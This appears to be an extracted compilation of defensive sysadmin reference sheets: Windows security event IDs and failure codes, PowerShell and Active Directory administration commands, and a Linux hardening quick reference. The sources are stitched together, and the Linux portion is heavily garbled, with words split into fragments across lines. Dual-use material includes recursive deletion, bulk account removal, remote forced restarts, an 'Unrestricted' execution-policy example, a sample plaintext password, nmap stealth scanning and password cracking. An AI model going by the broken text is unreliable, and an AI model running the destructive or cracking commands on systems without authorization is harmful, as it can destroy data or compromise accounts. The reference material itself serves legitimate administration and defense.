Name change
User changed own password
Privileged User changed this user’s password
User Account Changes
4624
4647
4625
4778
4779
4800
Successful logon
User initiated logo�
Remote desktop session disconnected
Workstation locked
Logon failure (See Logon Failure Codes)
Remote desktop session reconnected
4801
4802
4803
Screen saver invoked
Screen saver dismissed
Workstation unlocked
Logon Session Events
2
3
4
5
7
8
Interactive
Network (i.e. mapped drive)
Unlock (i.e. unnattended workstation withpassword protected screen saver)Network Cleartext (Most often indicates alogon to IIS with “basic authentication”)
Batch (i.e. schedule task)
Service (service startup)
10
11 Logon with cached credentials
Remote Desktop
Logon Types
Local 4731
4727
4754
4744
4749
4759
4737
4735
4755
4745
4750
4760
4734
4730
4758
4748
4753
4763
4732
4728
4756
4746
4751
4761
4733
4729
4757
4747
4752
4762
Global
Universal
Local
Global
Universal
4768
4771
4772
0x6 Bad user name
Domain ControllerAuthentication Events
Group Changes
Security
Distribution
Created Changed DeletedAdded Removed
Member
A Kerberos authentication ticket (TGT)was requested
Kerberos pre-authentication failed
A Kerberosauthentication ticketrequested failed
See KerberosFailure Codes
0x7 New computer account?
0x9 Administrator should reset password
0xC Workstation restriction
0x12Account disabled, expired, locked out,logon hours restriction
0x17 The user’s password has expired
0x18 Bad password
0x20 Frequently logged by computer accounts
0x25 Workstation’s clock too far out of sync with the DC’s
Kerberos Failure Codes
Logon Failure Codes
0xC00000640xC000006A0xC0000234
0xC0000072
0xC000006F
0xC0000070
0xC00000193
0xC0000071
0xC0000133
0xC0000224
0xC0000225
User name does not existUser name is correct but the password is wrongUser is currently locked out
Account is currently disabledUser tried to logon outside his day of week or time of day restrictionsWorkstation restrictionAccount expiration
Expired passwordClocks between DC and other computer too far out of sync
User is required to change password at next logon
Evidently a bug in Windows and not a risk
0xC000015b The user has not been granted the requested logon type (aka logon right) at this machine
Bridge the Gap Between Application and SIEM
Correlate byLogon ID
TM
60 69
PowerShell RUNAS Starting with PowerShell 4.0, we can specify that a script
requires administrative privileges by including a #Requires
statement with the -RunAsAdministrator switch
parameter.#Requires -RunAsAdministrator
Run a script on a remote computer
-- invoke-command -computername machine1, machine2 -
filepath c:\Script\script.ps1
Remotely shut down another machine after one minute
-- Start-Sleep 60; Restart-Computer –Force –
ComputerName TARGETMACHINE
Install an MSI package on a remote computer
-- (Get-WMIObject -ComputerName TARGETMACHINE
-List | Where-Object -FilterScript {$_.Name -eq
"Win32_Product"}).Install(\\MACHINEWHEREMSIRESI
DES\path\package.msi)
Upgrade an installed application with an MSI-based
application upgrade package
-- (Get-WmiObject -Class Win32_Product -ComputerName
. -Filter
"Name='name_of_app_to_be_upgraded'").Upgrade(\\MAC
HINEWHEREMSIRESIDES\path\upgrade_package.msi)
Remove an MSI package from the current computer
-- (Get-WmiObject -Class Win32_Product -Filter
"Name='product_to_remove'" -ComputerName .
).Uninstall()
Collecting information Get information about the make and model of a
computer
-- Get-WmiObject -Class Win32_ComputerSystem
Get information about the BIOS of the current
computer
-- Get-WmiObject -Class Win32_BIOS -ComputerName .
List installed hotfixes (QFEs, or Windows Update files)
-- Get-WmiObject -Class Win32_QuickFixEngineering -
ComputerName .
Get the username of the person currently logged on to a
computer
-- Get-WmiObject -Class Win32_ComputerSystem -
Property UserName -ComputerName .
Find just the names of installed applications on the
current computer
-- Get-WmiObject -Class Win32_Product -ComputerName
. | Format-Wide -Column 1
Get IP addresses assigned to the current computer
-- Get-WmiObject -Class
Win32_NetworkAdapterConfiguration -Filter
IPEnabled=TRUE -ComputerName . | Format-Table -
Property IPAddress
Get a more detailed IP configuration report for the
current machine
-- Get-WmiObject -Class
Win32_NetworkAdapterConfiguration -Filter
IPEnabled=TRUE -ComputerName . | Select-Object -
Property [a-z]* -ExcludeProperty IPX*,WINS*
To find network cards with DHCP enabled on the
current computer
-- Get-WmiObject -Class
Win32_NetworkAdapterConfiguration -Filter
"DHCPEnabled=true" -ComputerName .
Enable DHCP on all network adapters on the current
computer
-- Get-WmiObject -Class
Win32_NetworkAdapterConfiguration -Filter
IPEnabled=true -ComputerName . | ForEach-Object -
Process {$_.EnableDHCP()}
Navigate the Windows Registry like the file system -- cd
hkcu:
Search recursively for a certain string within files -- dir
–r | select string "searchforthis"
Find the five processes using the most memory -- ps |
sort –p ws | select –last 5
Cycle a service (stop, and then restart it) like DHCP --
Restart-Service DHCP
List all items within a folder -- Get-ChildItem – Force
Recurse over a series of directories or folders -- Get-
ChildItem –Force c:\directory –Recurse
Remove all files within a directory without being
prompted for each -- Remove-Item C:\tobedeleted –
Recurse
Restart the current computer -- (Get-WmiObject -Class
Win32_OperatingSystem -ComputerName
.).Win32Shutdown(2)
6170
Set-ExecutionPolicy
Although you can create and execute PowerShell scripts,
Microsoft has disabled scripting by default in an effort to
prevent malicious code from executing in a PowerShell
environment. You can use the Set-ExecutionPolicy
command to control the level of security surrounding
PowerShell scripts. Four levels of security are available to
you:
Restricted -- Restricted is the default execution policy
and locks PowerShell down so that commands can be
entered only interactively. PowerShell scripts are not
allowed to run.
All Signed -- If the execution policy is set to All
Signed then scripts will be allowed to run, but only if
they are signed by a trusted publisher.
Remote Signed -- If the execution policy is set to
Remote Signed, any PowerShell scripts that have been
locally created will be allowed to run. Scripts created
remotely are allowed to run only if they are signed by a
trusted publisher.
Unrestricted -- As the name implies, Unrestricted
removes all restrictions from the execution policy.
You can set an execution policy by entering the Set-
ExecutionPolicy command followed by the name of the
policy. For example, if you wanted to allow scripts to run
in an unrestricted manner you could type:
Set-ExecutionPolicy Unrestricted
Get-ExecutionPolicy If you're working on an unfamiliar server, you'll need to
know what execution policy is in use before you attempt to
run a script. You can find out by using the Get-
ExecutionPolicy command.
Get-Service The Get-Service command provides a list of all of the
services that are installed on the system. If you are
interested in a specific service you can append the -Name
switch and the name of the service (wildcards are
permitted) When you do, Windows will show you the
service's state.
Export-CSV Just as you can create an HTML report based on
PowerShell data, you can also export data from PowerShell
into a CSV file that you can open using Microsoft Excel.
The syntax is similar to that of converting a command's
output to HTML. At a minimum, you must provide an
output filename. For example, to export the list of system
services to a CSV file, you could use the following
command:
Get-Service | Export-CSV c:\service.csv
Select-Object If you tried using the command above, you know that there
were numerous properties included in the CSV file. It's
often helpful to narrow things down by including only the
properties you are really interested in. This is where the
Select-Object command comes into play. The Select-Object
command allows you to specify specific properties for
inclusion. For example, to create a CSV file containing the
name of each system service and its status, you could use
the following command:
Get-Service | Select-Object Name, Status | Export-
CSV c:\service.csv
Get-Process Just as you can use the Get-Service command to display a
list of all of the system services, you can use the Get-
Process command to display a list of all of the processes
that are currently running on the system.
Stop-Process Sometimes, a process will freeze up. When this happens,
you can use the Get-Process command to get the name or
the process ID for the process that has stopped responding.
You can then terminate the process by using the Stop-
Process command. You can terminate a process based on
its name or on its process ID. For example, you could
terminate Notepad by using:
Stop-Process -Name notepad
Stop-Process -ID 2668
PowerShell Active Directory Reset a User Password Let's start with a typical IT pro task: resetting a user's
password. We can easily accomplish this by using the Set-
ADAccountPassword cmdlet. The tricky part is that the
new password must be specified as a secure string: a piece
of text that's encrypted and stored in memory for the
duration of your PowerShell session. So first, we'll create a
variable with the new password:
PS C:\> $new=Read-Host "Enter the new password" -AsSecureString Next, we'll enter the new password:
PS C:\> Now we can retrieve the account (using the
samAccountname is best) and provide the new password.
Here's the change for user Jack Frost:
PS C:\> Set-ADAccountPassword jfrost -NewPassword $new Unfortunately, there's a bug with this cmdlet: -Passthru, -
Whatif, and -Confirm don't work. If you prefer a one-line
approach, try this:
PS C:\> Set-ADAccountPassword jfrost -NewPassword (ConvertTo-SecureString -AsPlainText -String "P@ssw0rd1z3" -force) Finally, I need Jack to change his password at his next
logon, so I'll modify the account by using Set-ADUser:
PS C:\> Set-ADUser jfrost -ChangePasswordAtLogon $True The command doesn't write to the pipeline or console
unless you use -True. But I can verify success by retrieving
the username via the Get-ADUser cmdlet and specifying
the PasswordExpired property, shown in Figure 2.
6271
Disable and Enable a User Account Next, let's disable an account. We'll continue to pick on
Jack Frost. This code takes advantage of the
-Whatif parameter, which you can find on many cmdlets
that change things, to verify my command without running
it:
PS C:\> Disable-ADAccount jfrost -whatif What if: Performing operation "Set" on Target "CN=Jack Frost, OU=staff,OU=Testing,DC=GLOBOMANTICS,DC=local". Now to do the deed for real:
PS C:\> Disable-ADAccount jfrost When the time comes to enable the account, can you guess
the cmdlet name?
PS C:\> Enable-ADAccount jfrost These cmdlets can be used in a pipelined expression to
enable or disable as many accounts as you need. For
example, this code disables all user accounts in the Sales
department:
PS C:\> get-aduser -filter "department -eq 'sales'" | disable-adaccount
Unlock a User Account Now, Jack has locked himself out after trying to use his
new password. Rather than dig through the GUI to find his
account, I can unlock it by using this simple command:
PS C:\> Unlock-ADAccount jfrost
Delete a User Account Deleting 1 or 100 user accounts is easy with the Remove-
ADUser cmdlet. I don't want to delete Jack Frost, but if I
did, I could use this code:
PS C:\> Remove-ADUser jfrost -whatif What if: Performing operation "Remove" on Target "CN=Jack Frost,OU=staff,OU=Testing,DC=GLOBOMANTICS,DC=local". Or I could pipe in a bunch of users and delete
them with one simple command:
PS C:\> get-aduser -filter "enabled -eq 'false'" -property WhenChanged -SearchBase "OU=Employees, DC=Globomantics,DC=Local" | where {$_.WhenChanged -le (Get-Date).AddDays(-180)} | Remove-ADuser -whatif This one-line command would find and delete all disabled
accounts in the Employees organizational unit (OU) that
haven't been changed in at least 180 days.
Add Members to a Group Let's add Jack Frost to the Chicago IT group:
PS C:\> add-adgroupmember "chicago IT" -Members jfrost It's that simple. You can just as easily add hundreds of
users to a group, although doing so is a bit more awkward
than I would like:
PS C:\> Add-ADGroupMember "Chicago Employees" -member (get-aduser -filter "city -eq 'Chicago'")
I used a parenthetical pipelined expression to find all users
with a City property of Chicago. The code in the
parentheses is executed and the resulting objects are piped
to the -Member parameter. Each user object is then added
to the Chicago Employees group. It doesn't matter whether
there are 5 or 500 users; updating group membership takes
only a few seconds This expression could also be written
using ForEach-Object, which might be easier to follow.
PS C:\> Get-ADUser -filter "city -eq 'Chicago'" | foreach {Add-ADGroupMember "Chicago Employees" -Member $_}
Enumerate Members of a Group You might want to see who belongs to a given group. For
example, you should periodically find out who belongs to
the Domain Admins group:
PS C:\> Get-ADGroupMember "Domain Admins"
The cmdlet writes an AD object for each member to the
pipeline. But what about nested groups? My Chicago All
Users group is a collection of nested groups. To get a list of
all user accounts, all I need to do is use the -Recursive
parameter:
PS C:\> Get-ADGroupMember "Chicago All Users" -Recursive | Select DistinguishedName
Disable a Computer Account Perhaps when you find those inactive or obsolete accounts,
you'd like to disable them. Easy enough. We'll use the same
cmdlet that we use with user accounts. You can specify it
by using the account's samAccountname:
PS C:\> Disable-ADAccount -Identity "chi-srv01$" -whatif What if: Performing operation "Set" on Target "CN=CHI-
SRV01,
CN=Computers,DC=GLOBOMANTICS,DC=local".
Or you can use a pipelined expression:
PS C:\> get-adcomputer "chi-srv01" | Disable-ADAccount I can also take my code to find obsolete accounts and
disable all those accounts:
PS C:\> get-adcomputer -filter "Passwordlastset -lt '1/1/2012'" -properties *| Disable-ADAccount
6372
Find Computers by Type The last task that I'm often asked about is finding computer
accounts by type, such as servers or laptops. This requires a
little creative thinking on your part. There's nothing in AD
that distinguishes a server from a client, other than the OS.
If you have a laptop or desktop running Windows Server
2008, you'll need to get extra creative.
You need to filter computer accounts based on the OS. It
might be helpful to get a list of those OSs first:
PS C:\> Get-ADComputer -Filter * -Properties OperatingSystem | Select OperatingSystem -unique | Sort OperatingSystem
I want to find all the computers that have a server OS:
PS C:\> Get-ADComputer -Filter "OperatingSystem -like '*Server*'" -properties OperatingSystem,OperatingSystem ServicePack | Select Name,Op* | format-list
As with the other AD Get cmdlets, you can fine-tune your
search parameters and limit your query to a specific OU if
necessary. All the expressions that I've shown you can be
integrated into larger PowerShell expressions. For example,
you can sort, group, filter, export to a comma-separated
value (CSV), or build and email an HTML report, all from
PowerShell and all without writing a single PowerShell
script! In fact, here's a bonus: a user password-age report,
saved as an HTML file:
PS C:\> Get-ADUser -Filter "Enabled -eq 'True' -AND PasswordNeverExpires -eq 'False'" -Properties PasswordLastSet,PasswordNeverExpires,PasswordExpired | Select DistinguishedName,Name,pass*,@{Name="PasswordAge"; Expression={(Get-Date)-$_.PasswordLastSet}} |sort PasswordAge -Descending | ConvertTo-Html -Title "Password Age Report" | Out-File c:\Work\pwage.htm
6473
Mo
nito
rin
g t
he
pe
rmis
sio
ns o
n s
yste
m f
iles is c
rucia
l to
ma
inta
in h
ost
inte
gri
ty.
• R
eg
ula
rly a
ud
it y
ou
r syste
ms fo
r a
ny u
na
uth
ori
ze
d a
nd
un
ne
ce
ssa
ry u
se
of th
e s
etu
id o
r se
tgid
pe
rmis
sio
ns.
“Se
t-u
se
r-ID
ro
ot”
pro
gra
ms r
un
as t
he
root
use
r , r
eg
ard
less o
f w
ho
is e
xe
cu
tin
g t
he
m,
an
d a
re a
fre
qu
en
t ca
use
of
bu
ffe
r o
ve
rflo
ws.
Ma
ny p
rog
ram
s a
re s
etu
id a
nd
se
tgid
to
en
ab
le a
no
rma
l u
se
r to
pe
rfo
rm o
pe
ratio
ns t
ha
t w
ou
ld o
the
rwis
e r
eq
uir
e r
oo
t, a
nd
ca
n b
e r
em
ove
d if
yo
ur
use
rs d
o n
ot n
ee
d s
uch
pe
rmis
sio
n. F
ind
all
se
tuid
an
d s
etg
id p
rog
ram
s o
n y
ou
r h
ost a
nd
de
scri
min
ate
ly r
em
ove
th
e s
etu
id o
r se
tgid
pe
rmis
sio
ns o
n a
su
sp
icio
us p
rog
ram
with
chmod
:
root# find / -type f -perm +6000 -ls
59520 30 -rwsr-xr-x 1 root root 30560 Apr 15 1999 /usr/bin/chage
59560 16 -r-sr-sr-x 1 root lp 15816 Jan 6 2000 /usr/bin/lpq
root# chmod -s /usr/bin/chage /usr/bin/lpq
root# ls -l /usr/bin/lpq /usr/bin/chage
-rwxr-xr-x 1 root root 30560 Apr 15 1999 /usr/bin/chage
-r-xr-xr-x 1 root lp 15816 Jan 6 2000 /usr/bin/lpq
• W
orl
d-w
rita
ble
file
s a
re e
asily
alte
red
or
rem
ove
d.
Lo
ca
te a
ll w
orl
d-w
rita
ble
file
s o
n y
ou
r syste
m:
root# find / -perm -2 ! -type l -ls
In t
he
no
rma
l co
urs
e o
f o
pe
ratio
n,
se
ve
ral file
s w
ill b
e w
orl
d-w
rita
ble
, in
clu
din
g s
om
e f
rom
/d
ev
an
d
the
/tm
p d
ire
cto
ry its
elf.
• L
oca
te a
nd
id
en
tify
all
file
s t
ha
t d
o n
ot
ha
ve
an
ow
ne
r o
r b
elo
ng
to
a g
rou
p.
Un
ow
ne
d f
iles m
ay a
lso
be
an
in
dic
atio
n a
n in
tru
de
r h
as a
cce
sse
d y
ou
r syste
m.
root# find / -nouser -o -nogroup
• U
sin
g t
he
lsattr
an
d chattr
co
mm
an
ds,
ad
min
istr
ato
rs c
an
mo
dify c
ha
racte
ristics o
f file
s a
nd
dir
ecto
rie
s,
inclu
din
g t
he
ab
ility
to
co
ntr
ol d
ele
tio
n a
nd
mo
dific
atio
n a
bo
ve
wh
at
no
rma
l chmod
pro
vid
es.
Th
e u
se
of
“ap
pe
nd
-on
ly”
an
d “
imm
uta
ble
” a
ttri
bu
tes c
an
be
pa
rtic
ula
rly e
ffe
ctive
in
pre
ve
ntin
g lo
g f
iles f
rom
be
ing
de
lete
d,
or
Tro
jan
Ho
rse
s f
rom
be
ing
pla
ce
d o
n t
op
of
tru
ste
d
bin
ari
es.
Wh
ile n
ot
a g
ua
ran
tee
a s
yste
m f
ile o
r lo
g w
on
’t b
e m
od
ifie
d,
on
ly r
oo
t h
as t
he
ab
ility
to
rem
ove
th
is p
rote
ctio
n.
Th
e chattr
co
mm
an
d is u
se
d t
o a
dd
or
rem
ove
th
ese
pro
pe
rtie
s,
wh
ile t
he
lsattr
ca
n b
e u
se
d t
o lis
t th
em
.
Lo
g f
iles c
an
be
pro
tecte
d b
y o
nly
pe
rmittin
g a
pp
en
din
g t
o t
he
m.
On
ce
th
e d
ata
ha
s b
ee
n w
ritt
en
, it
ca
nn
ot
be
re
mo
ve
d.
Wh
ile t
his
will
re
qu
ire
mo
dific
atio
ns t
o y
ou
r lo
g r
ota
tio
n s
cri
pts
, th
is c
an
pro
vid
e
ad
ditio
na
l p
rote
ctio
n f
rom
a c
racke
r a
tte
mp
tin
g t
o r
em
ove
his
tra
cks.
On
ce
ro
tate
d,
the
y s
ho
uld
be
ch
an
ge
d t
o im
mu
tab
le.
File
s s
uita
ble
fo
r th
ese
mo
dific
atio
ns in
clu
de
/bin/login
, /bin/rpm
,
/etc/shadow
, a
nd
oth
ers
th
at sh
ou
ld n
ot ch
an
ge
fre
qu
en
tly.
# chattr +i /bin/login
# chattr +a /var/log/messages
# lsattr /bin/login /var/log/messages
----i--- /bin/login
-----a-- /var/log/messages
• T
he
re s
ho
uld
ne
ve
r b
e a
re
aso
n f
or
use
r’s t
o b
e a
ble
to
ru
n s
etu
id p
rog
ram
s f
rom
th
eir
ho
me
dir
ecto
rie
s.
Use
th
e nosuid
op
tio
n in
/etc/fstab
fo
r p
art
itio
ns t
ha
t a
re w
rita
ble
by o
the
rs t
ha
n
roo
t. Y
ou
ma
y a
lso
wis
h to
use
th
e nodev
an
d noexec
on
use
r’s h
om
e p
art
itio
ns, a
s w
ell
as /var
,
wh
ich
pro
hib
its e
xe
cu
tio
n o
f p
rog
ram
s,
an
d c
rea
tio
n o
f ch
ara
cte
r o
r b
lock d
evic
es,
wh
ich
sh
ou
ld
ne
ve
r b
e n
ece
ssa
ry a
nyw
ay.
Se
e t
he
mount
ma
n p
ag
e f
or
mo
re in
form
atio
n.
• AutoRPM
on
Re
d H
at a
nd
apt-get
on
De
bia
n c
an
be
use
d to
do
wn
loa
d a
nd
in
sta
ll
an
y p
acka
ge
s o
n y
ou
r syste
m fo
r w
hic
h th
ere
are
up
da
tes. U
se
ca
re w
he
n
au
tom
atica
lly u
pd
atin
g p
rod
uctio
n s
erv
ers
.
• IP
Ma
sq
ue
rad
ing
en
ab
les a
Lin
ux b
ox w
ith
mu
ltip
le in
terf
ace
s t
o a
ct
as a
ga
tew
ay t
o
rem
ote
ne
two
rks f
or
ho
sts
co
nn
ecte
d t
o t
he
Lin
ux b
ox o
n t
he
in
tern
al n
etw
ork
inte
rfa
ce
. S
ee
th
e I
P M
asq
ue
rad
ing
HO
WT
O f
or
imp
lem
en
tatio
n in
form
atio
n.
• In
sta
ll nmap
to
de
term
ine
po
ten
tia
l co
mm
un
ica
tio
n c
ha
nn
els
. C
an
de
term
ine
re
mo
te
OS
ve
rsio
n,
pe
rfo
rm “
ste
alth
” sca
ns b
y m
an
ipu
latin
g I
CM
P,
TC
P a
nd
UD
P,
an
d e
ve
n
po
ten
tia
lly d
ete
rmin
e t
he
re
mo
te u
se
rna
me
ru
nn
ing
th
e s
erv
ice
. S
tart
with
so
me
thin
g
sim
ple
lik
e:
# nmap 192.168.1.1
• P
assw
ord
-pro
tect
LIL
O f
or
se
rve
rs in
pu
blic
en
vir
on
me
nts
to
re
qu
ire
au
tho
riza
tio
n
wh
en
pa
ssin
g L
ILO
co
mm
an
d-l
ine
ke
rne
l p
ara
me
ters
at
bo
ot
tim
e.
Ad
d t
he
password
an
d restricted
arg
um
en
ts t
o /etc/lilo.conf
, th
en
be
su
re t
o r
e-r
un
/sbin/lilo
:
image = /boot/vmlinuz-2.2.17
label = Linux
read-only
restricted
password = your-password
• T
he
Op
en
Wa
ll ke
rne
l p
atc
h is a
use
ful se
t o
f ke
rne
l se
cu
rity
im
pro
ve
me
nts
th
at
he
lps t
o p
reve
nt
bu
ffe
r o
ve
rflo
ws,
restr
ict
info
rma
tio
n in
/proc
ava
ilab
le t
o n
orm
al
use
rs, a
nd
oth
er
ch
an
ge
s. R
eq
uir
es c
om
pili
ng
th
e k
ern
el, a
nd
no
t fo
r n
ew
bie
s.
• E
nsu
re s
yste
m c
locks a
re a
ccu
rate
. T
he
tim
e s
tam
ps o
n lo
g f
iles m
ust
be
accu
rate
so
se
cu
rity
eve
nts
ca
n b
e c
orr
ela
ted
with
re
mo
te s
yste
ms.
In
accu
rate
re
co
rds m
ake
it
imp
ossib
le t
o b
uild
a t
ime
line
. F
or
wo
rksta
tio
ns,
it is e
no
ug
h t
o a
dd
a c
ron
tab
en
try:
0-59/30 * * * * root /usr/sbin/ntpdate -su time.timehost.com
• In
sta
ll a
nd
exe
cu
te t
he
Ba
stille
Lin
ux h
ard
en
ing
to
ol.
Ba
stille
is a
su
ite
of
sh
ell
scri
pts
th
at
elim
ina
tes m
an
y o
f th
e v
uln
era
bili
tie
s t
ha
t a
re c
om
mo
n o
n d
efa
ult L
inu
x
insta
llatio
ns.
It e
na
ble
s u
se
rs t
o m
ake
ed
uca
ted
ch
oic
es t
o im
pro
ve
se
cu
rity
by a
skin
g
qu
estio
ns a
s it
inte
ractive
ly s
tep
s t
hro
ug
h s
ecu
rin
g t
he
ho
st.
F
ea
ture
s in
clu
de
ba
sic
pa
cke
t filte
rin
g,
de
activa
tin
g u
nn
ece
ssa
ry n
etw
ork
se
rvic
es,
au
ditin
g f
ile p
erm
issio
ns,
an
d m
ore
. T
ry t
he
no
n-i
ntr
usiv
e t
est
mo
de
fir
st.
• C
on
fig
ure
sudo
(su
pe
ruse
r d
o)
to e
xe
cu
te p
rivile
ge
d c
om
ma
nd
s a
s a
no
rma
l u
se
r
inste
ad
of
usin
g su
. T
he
ad
min
istr
ato
r su
pp
lies h
is o
wn
pa
ssw
ord
to
exe
cu
te s
pe
cific
co
mm
an
ds t
ha
t w
ou
ld o
the
rwis
e r
eq
uir
e root
acce
ss.
Th
e f
ile /etc/sudoers
file
co
ntr
ols
wh
ich
use
rs m
ay e
xe
cu
te w
hic
h p
rog
ram
s.
To
pe
rmit D
ave
to
on
ly m
an
ipu
late
the
pri
nte
r o
n m
ag
ne
to:
Cmnd_Alias LPCMDS = /usr/sbin/lpc, /usr/bin/lprm
dave magneto = LPCMDS
Dave e
xecute
s sudo
with
th
e a
uth
ori
ze
d c
om
ma
nd
an
d e
nte
rs h
is o
wn
pa
ssw
ord
wh
en
pro
mp
ted
:
dave$ sudo /usr/sbin/lpc
Password: <password>
lpc>
• P
assw
ord
se
cu
rity
is t
he
mo
st
ba
sic
me
an
s o
f a
uth
en
tica
tio
n,
ye
t th
e m
ost
cri
tica
l
me
an
s t
o p
rote
ct
yo
ur
syste
m f
rom
co
mp
rom
ise
. It
is a
lso
on
e o
f th
e m
ost
ove
rlo
oke
d
me
an
s.
With
ou
t a
n e
ffe
ctive
we
ll-ch
ose
n p
assw
ord
, yo
ur
syste
m is s
ure
to
be
co
mp
rom
ise
d.
Ob
tain
ing
acce
ss t
o a
ny u
se
r a
cco
un
t o
n t
he
syste
m is t
he
to
ug
h p
art
.
Fro
m th
ere
, ro
ot a
cce
ss is o
nly
a s
tep
aw
ay.
Ru
n p
assw
ord
-cra
ckin
g p
rog
ram
s s
uch
as
Jo
hn
th
e R
ipp
er
or
Cra
ck r
eg
ula
rly o
n s
yste
ms fo
r w
hic
h y
ou
’re
re
sp
on
sib
le to
en
su
re
pa
ssw
ord
se
cu
rity
is m
ain
tain
ed
. D
isa
ble
un
use
d a
cco
un
ts u
sin
g /usr/bin/passwd
-l
. U
se
th
e M
D5
pa
ssw
ord
du
rin
g in
sta
ll if y
ou
r d
istr
ibu
tio
n s
up
po
rts it.
• P
acke
t filte
rin
g isn
’t ju
st
for
fire
wa
lls.
Usin
g ipchains
, yo
u c
an
pro
vid
e a
sig
nific
an
t
am
ou
nt
of
pro
tectio
n f
rom
exte
rna
l th
rea
ts o
n a
ny L
inu
x b
ox.
Blo
ckin
g a
cce
ss t
o a
pa
rtic
ula
r se
rvic
e f
rom
co
nn
ectin
g o
uts
ide
of
yo
ur
loca
l n
etw
ork
yo
u m
igh
t tr
y:
# ipchains -I input -p TCP -s 192.168.1.11 telnet -j DENY -l
Th
is w
ill p
reve
nt
inco
min
g a
cce
ss t
o t
he
telnet
po
rt o
n y
ou
r lo
ca
l m
ach
ine
if
the
co
nn
ectio
n o
rig
ina
tes f
rom
192.168.1.11
. T
his
is a
ve
ry s
imp
le e
xa
mp
le.
Be
su
re
to r
ea
d t
he
IP
Ch
ain
s H
OW
TO
be
fore
im
ple
me
ntin
g a
ny f
ire
wa
llin
g.
• A
pa
ch
e d
ire
cto
ry a
nd
pa
ssw
ord
pro
tectio
n
http://w
ww
.apachew
eek.c
om
/featu
res/u
sera
uth
• B
astille
Lin
ux P
roje
ct
htt
p:/
/ww
w.b
astille
-lin
ux.o
rg
• B
ug
Tra
q F
ull
Dis
clo
su
re M
aili
ng
Lis
t
htt
p:/
/ww
w.s
ecu
rity
focu
s.c
om
/fo
rum
s/b
ug
tra
q/in
tro
.htm
l
• B
uild
ing
In
tern
et
Fir
ew
alls
, S
eco
nd
Ed
itio
n
O’R
eill
y &
Asso
c, IS
BN
15
65
92
87
17
• C
ER
T S
ecu
rity
Im
pro
ve
me
nt
Mo
du
les
htt
p:/
/ww
w.c
ert
.org
/se
cu
rity
-im
pro
ve
me
nt
• In
tro
du
ctio
n t
o L
inu
x S
ecu
rity
htt
p:/
/ww
w.lin
ux-m
ag
.co
m/1
99
9-1
0/s
ecu
rity
_0
1.h
tml
• L
inu
x I
ntr
usio
n D
ete
ctio
n R
eso
urc
es
htt
p:/
/ww
w.lin
uxse
cu
rity
.co
m/in
tru
sio
n-d
ete
ctio
n
• Jo
hn
th
e R
ipp
er
Pa
ssw
ord
Cra
cke
r
htt
p:/
/ww
w.o
pe
nw
all.
co
m/jo
hn
• L
inu
x a
nd
Op
en
So
urc
e S
ecu
rity
Ad
vis
ori
es
htt
p:/
/ww
w.lin
uxse
cu
rity
.co
m/a
dvis
ori
es
• L
inu
xS
ecu
rity
.co
m S
ecu
rity
Re
fere
nce
In
fo
htt
p:/
/ww
w.lin
uxse
cu
rity
.co
m/d
ocs
• L
inu
xS
ecu
rity
.co
m S
ecu
rity
Dis
cu
ssio
n L
ists
htt
p:/
/ww
w.lin
uxse
cu
rity
.co
m/m
aili
ng
-lis
ts.h
tml
• L
inu
xS
ecu
rity
.co
m T
ip o
f th
e D
ay
htt
p:/
/ww
w.lin
uxse
cu
rity
.co
m/t
ips
• L
inu
xS
ecu
rity
.co
m W
ee
kly
Se
cu
rity
Ne
wsle
tte
r
htt
p:/
/ww
w.lin
uxse
cu
rity
.co
m/n
ew
sle
tte
r.h
tml
• O
pe
nS
SH
se
cu
re r
em
ote
acce
ss to
ol
http://w
ww
.openssh.c
om
• O
pe
nW
all
Se
cu
rity
Pro
ject
htt
p:/
/ww
w.o
pe
nw
all.
co
m
• N
etw
ork
Tim
e P
roto
co
l in
form
atio
n
htt
p:/
/ww
w.n
tp.o
rg
• n
ma
p P
ort
Sca
nn
er
htt
p:/
/ww
w.in
se
cu
re.o
rg/n
ma
p
• P
ractica
l U
NIX
& I
nte
rne
t S
ecu
rity
, S
eco
nd
Ed
.
O’R
eill
y &
Asso
c, IS
BN
15
65
92
14
88
• rs
yn
c I
ncre
me
nta
l F
ile T
ran
sfe
r U
tilit
y
htt
p:/
/rsyn
c.s
am
ba
.org
• S
ecu
re S
he
ll F
AQ
htt
p:/
/ww
w.e
mp
loye
es.o
rg/~
sa
tch
/ssh
/fa
q/
• S
ecu
rity
-re
late
d H
OW
TO
s a
nd
FA
Qs
htt
p:/
/ww
w.lin
uxse
cu
rity
.co
m/d
ocs
• S
ite
Se
cu
rity
Ha
nd
bo
ok (
RF
C2
19
6)
htt
p:/
/ww
w.lin
uxse
cu
rity
.co
m/d
ocs/r
fcs/r
fc2
19
6.t
xt
• su
do
ro
ot a
cce
ss c
on
tro
l to
ol
http://w
ww
.court
esan.c
om
/sudo
• S
no
rt N
etw
ork
In
tru
sio
n D
ete
ctio
n S
yste
m
http://w
ww
.snort
.org
• T
rip
wire
file
in
teg
rity
to
ol
htt
p:/
/ww
w.t
rip
wir
ese
cu
rity
.co
m
• U
sin
g S
no
rt
htt
p:/
/ww
w.lin
uxse
cu
rity
.co
m/u
sin
g-s
no
rt.h
tml
Lin
ux S
ecu
rity
Qu
ick
Ref
eren
ce G
uid
e
Th
e in
ten
t o
f th
is Q
uic
k R
efe
ren
ce
Gu
ide
is to
pro
vid
e a
sta
rtin
g p
oin
t fo
r im
pro
vin
g th
e s
ecu
rity
of yo
ur
syste
m, to
se
rve
as a
po
inte
r to
mo
re in
-de
pth
se
cu
rity
info
rma
tio
n, a
nd
to
incre
ase
se
cu
rity
aw
are
ne
ss
an
d m
eth
od
s t
ha
t ca
n b
e u
se
d t
o i
mp
rove
se
cu
rity
. It
is n
ot
a s
ub
stitu
te f
or
rea
din
g a
ny o
f th
e v
ast
am
ou
nts
of
Lin
ux s
ecu
rity
do
cu
me
nta
tio
n t
ha
t a
lre
ad
y e
xis
ts.
In th
e e
ve
r-ch
an
gin
g w
orl
d o
f g
lob
al d
ata
co
mm
un
ica
tio
ns, in
exp
en
siv
e In
tern
et co
nn
ectio
ns, a
nd
fa
st-
pa
ce
d s
oft
wa
re d
eve
lop
me
nt,
se
cu
rity
is b
eco
min
g m
ore
an
d m
ore
of a
n issu
e. S
ecu
rity
is n
ow
a b
asic
req
uir
em
en
t b
eca
use
glo
ba
l co
mp
utin
g is
inh
ere
ntly in
se
cu
re. A
s y
ou
r d
ata
go
es fro
m p
oin
t A
to
po
int B
on
th
e In
tern
et,
it m
ay p
ass th
rou
gh
se
ve
ral o
the
r p
oin
ts a
lon
g th
e w
ay,
giv
ing
oth
er
use
rs th
e o
pp
ort
u-
nity to
in
terc
ep
t, a
nd
eve
n a
lte
r, y
ou
r d
ata
. E
ve
n o
the
r u
se
rs o
n y
ou
r syste
m m
